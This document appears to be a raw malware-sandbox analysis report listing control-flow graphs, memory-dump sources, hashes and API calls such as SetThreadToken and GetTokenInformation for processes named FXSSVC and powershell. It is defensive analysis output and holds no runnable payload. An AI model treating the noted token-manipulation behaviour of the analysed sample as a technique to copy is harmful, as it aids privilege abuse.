                                                                                                                                                                                                                                      control_flow_graph 605 c9817f 606 c98184 605->606 607 c9818c-c98192 606->607 608 c98186 CloseHandle 606->608 609 c98115-c98118 607->609 610 c98194 607->610 608->607 611 c98119-c9811a 609->611 612 c980a7 609->612 610->609 613 c9819a 610->613 611->612 614 c9811c 611->614 615 c9813c 613->615 616 c9820f 614->616 615->606 617 c9808e-c98096 616->617 618 c98215-c9821e 616->618 617->606 617->612 618->617 620 c98224 618->620 621 c981d7-c981e6 call cc715c 620->621 622 c98226 620->622 632 c98089 621->632 633 c980ca-c9810f GetTokenInformation 621->633 622->621 624 c98228-c982ee call c95d90 622->624 634 c9830c-c9831e 624->634 635 c982f0 624->635 632->633 637 c9808b 632->637 638 c9812d 633->638 639 c98111 633->639 641 c982a1-c982ba call c95d90 call c9ec00 634->641 642 c98320 634->642 635->634 640 c982f2 635->640 649 c9808c 637->649 646 c980a8 638->646 647 c98133 638->647 639->638 643 c98113 639->643 644 c982f7-c982fc call c95d90 640->644 641->642 642->644 648 c98322 642->648 643->609 664 c98253-c98265 call cb1280 644->664 665 c98302 644->665 650 c980aa-c980ad 646->650 647->615 653 c981ed-c981f0 647->653 648->644 654 c98324-c98326 648->654 649->617 655 c98163-c98170 call cc7164 650->655 656 c980b3-c98203 650->656 657 c980da-c980f1 653->657 658 c981f6 653->658 661 c98328 654->661 655->608 677 c98172 655->677 656->655 673 c98209 656->673 657->650 658->657 663 c981fc 658->663 675 c982df-c9832b 661->675 676 c98335 661->676 671 c981fe-c98201 GetTokenInformation 663->671 664->661 685 c9826b 664->685 665->664 672 c98308-c9830a 665->672 671->616 690 c981b7 671->690 672->634 675->676 682 c9832d-c98331 675->682 678 c9826e-c98285 676->678 677->607 683 c9829b-c9829d 678->683 684 c98287 678->684 682->676 683->641 688 c9824c 684->688 685->678 689 c98239 685->689 688->683 691 c9824e-c98252 688->691 689->661 692 c9823f-c98243 689->692 690->616 693 c981b9-c981ca 690->693 691->678 692->644 692->688 696 c981d0 693->696 697 c980f3 693->697 696->671 702 c980c3 696->702 697->649 698 c980f5 697->698 698->649 703 c98077 698->703 702->671 704 c980c9 702->704 703->621 704->633
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                                                                                      • Instruction ID: 25b69ee1d124e7403cca4e6fc94c41dd2ce116e09c4f40f5d0cf959891d60270
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0C092A0558909875D38268A2C0E0BD35648723B60F0C4553ED268B360DE598F4B41A3

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:5.7%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:3
                                                                                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                                                                                      execution_graph 22833 8f66a58 22834 8f66a9b SetThreadToken 22833->22834 22835 8f66ac9 22834->22835

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 610 4f2b470-4f2b4a9 612 4f2b4ab 610->612 613 4f2b4ae-4f2b7e9 call 4f2acbc 610->613 612->613 674 4f2b7ee-4f2b7f5 613->674
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7cff61e8fc0ce77532b02f0539e2e04163451a5999a98da2e036b56e05d68e91
                                                                                                                                                                                                                                      • Instruction ID: f251c834fa9564e0f3c4d8660dcb26f845b04acdf476b9f0db00a28bf9643abc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cff61e8fc0ce77532b02f0539e2e04163451a5999a98da2e036b56e05d68e91
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96918471F406144FEB1AEFB4C4146AEB7E2EFC4604B04892DD54AAB340DF74A90B8BD6

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 675 4f2b490-4f2b4a9 676 4f2b4ab 675->676 677 4f2b4ae-4f2b7e9 call 4f2acbc 675->677 676->677 738 4f2b7ee-4f2b7f5 677->738
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ee532e25fd7ee5f9d8d9b5a4156730fae53127da51dbb9fdbbea3e504fa26ee8
                                                                                                                                                                                                                                      • Instruction ID: 548dafcf28384b01346472a5a13e7320abc1ef277facf2e227c2a43b8e01bb22
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee532e25fd7ee5f9d8d9b5a4156730fae53127da51dbb9fdbbea3e504fa26ee8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C917371F406145BEB1AEFB4C4155AEB7E2DFC4604B04892DD50AAB340DF74B9078BD6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$pij$pij$pij$pij$pij$|,j$J&l$J&l$J&l$J&l$J&l$J&l$r%l$r%l
                                                                                                                                                                                                                                      • API String ID: 0-2387264477
                                                                                                                                                                                                                                      • Opcode ID: a983c27cb248d241843444dd2047e899751bc1b82a162d99dcbfc989d789ef11
                                                                                                                                                                                                                                      • Instruction ID: c6eed264c71cbe0192813d0772a14c9ec2de347952b91cff4f29200aba01427c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a983c27cb248d241843444dd2047e899751bc1b82a162d99dcbfc989d789ef11
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 902225B1B0020A9FCB149F69C8517AEFBE1BF85311F15807AEA45CB251DB31ED85CBA1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 204 7df3ce8-7df3d0d 205 7df3d13-7df3d18 204->205 206 7df3f00-7df3f4a 204->206 207 7df3d1a-7df3d20 205->207 208 7df3d30-7df3d34 205->208 214 7df40ce-7df4112 206->214 215 7df3f50-7df3f55 206->215 209 7df3d24-7df3d2e 207->209 210 7df3d22 207->210 212 7df3d3a-7df3d3c 208->212 213 7df3eb0-7df3eba 208->213 209->208 210->208 216 7df3d3e-7df3d4a 212->216 217 7df3d4c 212->217 218 7df3ebc-7df3ec5 213->218 219 7df3ec8-7df3ece 213->219 238 7df4228-7df425d 214->238 239 7df4118-7df411d 214->239 222 7df3f6d-7df3f71 215->222 223 7df3f57-7df3f5d 215->223 221 7df3d4e-7df3d50 216->221 217->221 224 7df3ed4-7df3ee0 219->224 225 7df3ed0-7df3ed2 219->225 221->213 230 7df3d56-7df3d75 221->230 226 7df3f77-7df3f79 222->226 227 7df4080-7df408a 222->227 228 7df3f5f 223->228 229 7df3f61-7df3f6b 223->229 232 7df3ee2-7df3efd 224->232 225->232 234 7df3f7b-7df3f87 226->234 235 7df3f89 226->235 236 7df408c-7df4094 227->236 237 7df4097-7df409d 227->237 228->222 229->222 264 7df3d77-7df3d83 230->264 265 7df3d85 230->265 242 7df3f8b-7df3f8d 234->242 235->242 243 7df409f-7df40a1 237->243 244 7df40a3-7df40af 237->244 256 7df425f-7df4281 238->256 257 7df428b-7df4295 238->257 240 7df411f-7df4125 239->240 241 7df4135-7df4139 239->241 248 7df4129-7df4133 240->248 249 7df4127 240->249 251 7df413f-7df4141 241->251 252 7df41da-7df41e4 241->252 242->227 253 7df3f93-7df3fb2 242->253 254 7df40b1-7df40cb 243->254 244->254 248->241 249->241 258 7df4143-7df414f 251->258 259 7df4151 251->259 260 7df41e6-7df41ee 252->260 261 7df41f1-7df41f7 252->261 291 7df3fb4-7df3fc0 253->291 292 7df3fc2 253->292 298 7df42d5-7df42fe 256->298 299 7df4283-7df4288 256->299 272 7df429f-7df42a5 257->272 273 7df4297-7df429c 257->273 267 7df4153-7df4155 258->267 259->267 269 7df41fd-7df4209 261->269 270 7df41f9-7df41fb 261->270 275 7df3d87-7df3d89 264->275 265->275 267->252 276 7df415b-7df415d 267->276 277 7df420b-7df4225 269->277 270->277 278 7df42ab-7df42b7 272->278 279 7df42a7-7df42a9 272->279 275->213 280 7df3d8f-7df3d96 275->280 281 7df415f-7df4165 276->281 282 7df4177-7df417e 276->282 286 7df42b9-7df42d2 278->286 279->286 280->206 288 7df3d9c-7df3da1 280->288 289 7df4169-7df4175 281->289 290 7df4167 281->290 293 7df4196-7df41d7 282->293 294 7df4180-7df4186 282->294 300 7df3db9-7df3dc8 288->300 301 7df3da3-7df3da9 288->301 289->282 290->282 302 7df3fc4-7df3fc6 291->302 292->302 303 7df418a-7df4194 294->303 304 7df4188 294->304 320 7df432d-7df4338 298->320 321 7df4300-7df4326 298->321 300->213 316 7df3dce-7df3dec 300->316 306 7df3dad-7df3db7 301->306 307 7df3dab 301->307 302->227 308 7df3fcc-7df4003 302->308 303->293 304->293 306->300 307->300 328 7df401d-7df4024 308->328 329 7df4005-7df400b 308->329 316->213 327 7df3df2-7df3e17 316->327 330 7df433b-7df4348 320->330 321->320 327->213 351 7df3e1d-7df3e24 327->351 334 7df403c-7df407d 328->334 335 7df4026-7df402c 328->335 331 7df400f-7df401b 329->331 332 7df400d 329->332 330->330 333 7df434a-7df435c 330->333 331->328 332->328 338 7df435e-7df437b 333->338 339 7df4395-7df439f 333->339 340 7df402e 335->340 341 7df4030-7df403a 335->341 352 7df437d-7df438f 338->352 353 7df43e5-7df43ea 338->353 344 7df43a8-7df43ae 339->344 345 7df43a1-7df43a5 339->345 340->334 341->334 348 7df43b4-7df43c0 344->348 349 7df43b0-7df43b2 344->349 354 7df43c2-7df43e2 348->354 349->354 356 7df3e6a-7df3e9d 351->356 357 7df3e26-7df3e41 351->357 352->339 353->352 371 7df3ea4-7df3ead 356->371 363 7df3e5b-7df3e5f 357->363 364 7df3e43-7df3e49 357->364 368 7df3e66-7df3e68 363->368 365 7df3e4d-7df3e59 364->365 366 7df3e4b 364->366 365->363 366->363 368->371
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                                      • API String ID: 0-1420252700
                                                                                                                                                                                                                                      • Opcode ID: 76246f5be5d55e626b6d97a8ef77d631be6c7d1eb622a8faec24328d5ae3ae58
                                                                                                                                                                                                                                      • Instruction ID: 328bb98cda63333b3c8cfffc1739f2e889969d97771017a4fa5ad63e2311aaed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76246f5be5d55e626b6d97a8ef77d631be6c7d1eb622a8faec24328d5ae3ae58
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 671256F1B002499FCB249B68D81076BFBA2AFC1311F26847ADA45CF395DB31C895C7A1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 375 8f66a52-8f66a93 376 8f66a9b-8f66ac7 SetThreadToken 375->376 377 8f66ad0-8f66aed 376->377 378 8f66ac9-8f66acf 376->378 378->377
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1866933715.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8f60000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ThreadToken
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3254676861-0
                                                                                                                                                                                                                                      • Opcode ID: 9a49679a54bb933f44855cf0238f6082e305ca4d898f0fe405a1708856cb2b78
                                                                                                                                                                                                                                      • Instruction ID: 95223e0c8f953c18223f37f7527be50ea328e44aa89497264deca8c2311986d6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a49679a54bb933f44855cf0238f6082e305ca4d898f0fe405a1708856cb2b78
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D1116B59002588FDB10CFA9D544BDEFFF4EB49320F248559D459A7210C775A944CFA4

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 381 8f66a58-8f66ac7 SetThreadToken 383 8f66ad0-8f66aed 381->383 384 8f66ac9-8f66acf 381->384 384->383
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1866933715.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8f60000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ThreadToken
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3254676861-0
                                                                                                                                                                                                                                      • Opcode ID: f0e0f824936908a93964386f90b2e3932b7db733b98862e22dcafd016fcaff94
                                                                                                                                                                                                                                      • Instruction ID: 897fe1d6eaad1549245bddb8993578e05dab09f6c15a36b4b539f393777c64c2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0e0f824936908a93964386f90b2e3932b7db733b98862e22dcafd016fcaff94
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 131106B59002198FDB10DF9AC544BDEFBF8EB48324F248419D459A7310D779A944CFA5

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 387 4f26fe0-4f26fff 388 4f27105-4f27143 387->388 389 4f27005-4f27008 387->389 416 4f2700a call 4f27697 389->416 417 4f2700a call 4f2767c 389->417 390 4f27010-4f27022 392 4f27024 390->392 393 4f2702e-4f27043 390->393 392->393 399 4f27049-4f27059 393->399 400 4f270ce-4f270e7 393->400 401 4f27065-4f27073 call 4f2bf10 399->401 402 4f2705b 399->402 405 4f270f2 400->405 406 4f270e9 400->406 408 4f27079-4f2707d 401->408 402->401 405->388 406->405 409 4f2707f-4f2708f 408->409 410 4f270bd-4f270c8 408->410 411 4f27091-4f270a9 409->411 412 4f270ab-4f270b5 409->412 410->399 410->400 411->410 412->410 416->390 417->390
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                                                                                      • Opcode ID: ddbb3c2b4126aa7ff999eed93444990b2461095447497befbd9be7953bf7115d
                                                                                                                                                                                                                                      • Instruction ID: 796ef42765fa7eaeda9808340dc060fe2678401038ae48e99206b1bd7cfe79e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddbb3c2b4126aa7ff999eed93444990b2461095447497befbd9be7953bf7115d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D413C34B042558FDB04DFA9C568AAEBBF1EF8D311F144098E442AB395DB35EC46CB61

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 418 4f2af98-4f2afa1 call 4f2a984 420 4f2afa6-4f2afaa 418->420 421 4f2afba-4f2b055 420->421 422 4f2afac-4f2afb9 420->422 428 4f2b057-4f2b05d 421->428 429 4f2b05e-4f2b07b 421->429 428->429
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: (&^q
                                                                                                                                                                                                                                      • API String ID: 0-2067289071
                                                                                                                                                                                                                                      • Opcode ID: 3b320972de62864f5cdef9b0c869ff271f9fa857eae5d24ab7bc0a0a31de5f3a
                                                                                                                                                                                                                                      • Instruction ID: 8c0279adb61818aa688d769ac917a463e5b115aa56da968bbf1cd4f2cee8a2f9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b320972de62864f5cdef9b0c869ff271f9fa857eae5d24ab7bc0a0a31de5f3a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E321D171E042588FCB14DFAED4007AEBFF5EB88320F14846AD458A7340CA75A805CFA5

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 739 4f229f0-4f22a1e 740 4f22a24-4f22a3a 739->740 741 4f22af5-4f22b37 739->741 742 4f22a3f-4f22a52 740->742 743 4f22a3c 740->743 746 4f22c51-4f22c61 741->746 747 4f22b3d-4f22b56 741->747 742->741 750 4f22a58-4f22a65 742->750 743->742 748 4f22b5b-4f22b69 747->748 749 4f22b58 747->749 748->746 755 4f22b6f-4f22b79 748->755 749->748 752 4f22a67 750->752 753 4f22a6a-4f22a7c 750->753 752->753 753->741 757 4f22a7e-4f22a88 753->757 758 4f22b87-4f22b94 755->758 759 4f22b7b-4f22b7d 755->759 760 4f22a96-4f22aa6 757->760 761 4f22a8a-4f22a8c 757->761 758->746 762 4f22b9a-4f22baa 758->762 759->758 760->741 763 4f22aa8-4f22ab2 760->763 761->760 764 4f22baf-4f22bbd 762->764 765 4f22bac 762->765 766 4f22ac0-4f22af4 763->766 767 4f22ab4-4f22ab6 763->767 764->746 770 4f22bc3-4f22bd3 764->770 765->764 767->766 771 4f22bd5 770->771 772 4f22bd8-4f22be5 770->772 771->772 772->746 775 4f22be7-4f22bf7 772->775 776 4f22bf9 775->776 777 4f22bfc-4f22c08 775->777 776->777 777->746 779 4f22c0a-4f22c24 777->779 780 4f22c26 779->780 781 4f22c29 779->781 780->781 782 4f22c2e-4f22c38 781->782 783 4f22c3d-4f22c50 782->783
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e279b70a9a451a481fd209ad3bc87f72362fae80fb6120a8ddd9ea01aee33dba
                                                                                                                                                                                                                                      • Instruction ID: ae2407a51480893bc0e79adccb2dd831d3d0c27e357094e41ed4b289fbe97b99
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e279b70a9a451a481fd209ad3bc87f72362fae80fb6120a8ddd9ea01aee33dba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D191ACB4A002159FCB15CF59C5849AEFBB1FF88310B258699E815AB365C736FC52CFA0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 975 4f2bac0-4f2bb50 979 4f2bb52 975->979 980 4f2bb56-4f2bb61 975->980 979->980 981 4f2bb63 980->981 982 4f2bb66-4f2bbc0 call 4f2af98 980->982 981->982 989 4f2bbc2-4f2bbc7 982->989 990 4f2bc11-4f2bc15 982->990 989->990 993 4f2bbc9-4f2bbec 989->993 991 4f2bc26 990->991 992 4f2bc17-4f2bc21 990->992 994 4f2bc2b-4f2bc2d 991->994 992->991 995 4f2bbf2-4f2bbfd 993->995 996 4f2bc52-4f2bc55 call 4f2a978 994->996 997 4f2bc2f-4f2bc50 994->997 998 4f2bc06-4f2bc0f 995->998 999 4f2bbff-4f2bc05 995->999 1001 4f2bc5a-4f2bc5e 996->1001 997->1001 998->994 999->998 1004 4f2bc60-4f2bc89 1001->1004 1005 4f2bc97-4f2bcc6 1001->1005 1004->1005
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fa9ebcf4e5fd82f4077fda4a5d9b948e536df6c1f3cc1ac9a2c6ea60a53a3c27
                                                                                                                                                                                                                                      • Instruction ID: 261d1fec791a49874e2cdf34e4e47bffe092a3f1d7b05c684ec2d7e1cdff290c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa9ebcf4e5fd82f4077fda4a5d9b948e536df6c1f3cc1ac9a2c6ea60a53a3c27
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB612871E002188FDB14DFA9D684A9DFBF1EF88310F148169E819AB355EB74AC85CB60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ba5aaf6e9b6c126649643462771f6b712b98480439b8a2c8975586739fa8777a
                                                                                                                                                                                                                                      • Instruction ID: 16a0e0b5377e07430a6808a6e70db9dc12b4c24e9deb427b7a13491122bf1eb1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba5aaf6e9b6c126649643462771f6b712b98480439b8a2c8975586739fa8777a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87512771E00258CFCB15DFA9D584A9DBBF1EF88310F148069E819AB365EB74A885CF51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 07227e954525202605c785aa449ff2d7e9b1a8712b7dc7ff2b8f93d79a43546d
                                                                                                                                                                                                                                      • Instruction ID: 22469e893a6fd867428bccd8e4142b252258d93d8013a37ffa15c94a3ee7453b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07227e954525202605c785aa449ff2d7e9b1a8712b7dc7ff2b8f93d79a43546d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF4115F1A00206DFCB249B24C901B6BFBA2AF80744F1B85AADA049F295D735DD54C7A1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f11864a21b5b1b6cec700148d4453e01efef3f74c9c98b943de2057e862e9bef
                                                                                                                                                                                                                                      • Instruction ID: d519e8f47260eb6d9249dc5182f630c2a274fe283c5f136e60d4009d81a19707
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f11864a21b5b1b6cec700148d4453e01efef3f74c9c98b943de2057e862e9bef
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61413AB4A005159FCB09CF59C5989AEFBB1FF48310B128699D815AB364C736FC52CFA0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 199bf84c0ad1e8096c98d961b4962256f58044f4913300a3fc076b7075797f26
                                                                                                                                                                                                                                      • Instruction ID: 436a658121462849ff5217c9bc08d4b077b9ea0c37ffe4f9c9ad3c0ba86c00e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 199bf84c0ad1e8096c98d961b4962256f58044f4913300a3fc076b7075797f26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E317E313006109FD709EB78D954A6EB792EFC4315F008539D60ACB365DF71A846CBA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d29ac85c3ead7e576166fcd212c07bda1da7601254047daf42ecb6274dda4e2c
